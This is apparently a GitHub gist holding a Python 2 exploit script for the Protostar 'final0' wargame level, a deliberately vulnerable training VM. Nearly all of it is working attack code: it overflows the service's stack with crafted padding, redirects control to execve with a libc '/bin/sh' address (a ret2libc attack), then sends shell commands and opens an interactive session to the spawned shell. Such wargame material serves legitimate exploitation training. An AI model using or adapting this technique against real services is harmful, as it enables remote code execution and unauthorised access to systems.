@luc-lynx
Created December 18, 2017 07:29
Protostar final0 exploit
# ret2libc technique
import struct
import socket
import telnetlib
# Proof-of-concept for the Protostar "final0" wargame level (see the page
# title). Python 2 only: the `print` statement and the str/struct.pack()
# concatenation below do not run under Python 3.
HOST = '127.0.0.1'  # the level's service on the local Protostar VM
PORT = 2995
# 510 filler bytes, one NUL, then 21 more bytes. The layout is hand-tuned for
# this binary; presumably it places the values appended below over the saved
# return address -- TODO confirm against the level's stack frame.
padding = 'a' * 510 + '\x00' + 'aaaabbbbccccddddeeeef'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
execve_ret = "AAAA" # return address for execve (we don't care about it)
# "I" packs a native-endian unsigned int, so the bytes are only correct when
# this host matches the target's byte order and word size.
execve = struct.pack("I", 0x08048c0c) # execve address
# Fixed libc base plus a fixed offset: the constants are presumably specific to
# the author's Protostar image, and address randomisation would invalidate them.
binsh = struct.pack("I", 1176511 + 0xb7e97000) # "/bin/sh" string address in the libc
exploit = padding + execve + execve_ret + binsh + '\x00' * 8
s.send(exploit + '\n')
# Commands for the shell the author expects the redirected control flow to spawn.
s.send("id\n")
s.send("uname -a\n")
print s.recv(1024)  # single read of up to 1024 bytes (Python 2 print statement)
# Telnet() with no host does not connect; the existing socket is handed to it
# so interact() relays stdin/stdout over the same connection. The socket is
# never closed explicitly.
t = telnetlib.Telnet()
t.sock = s
t.interact()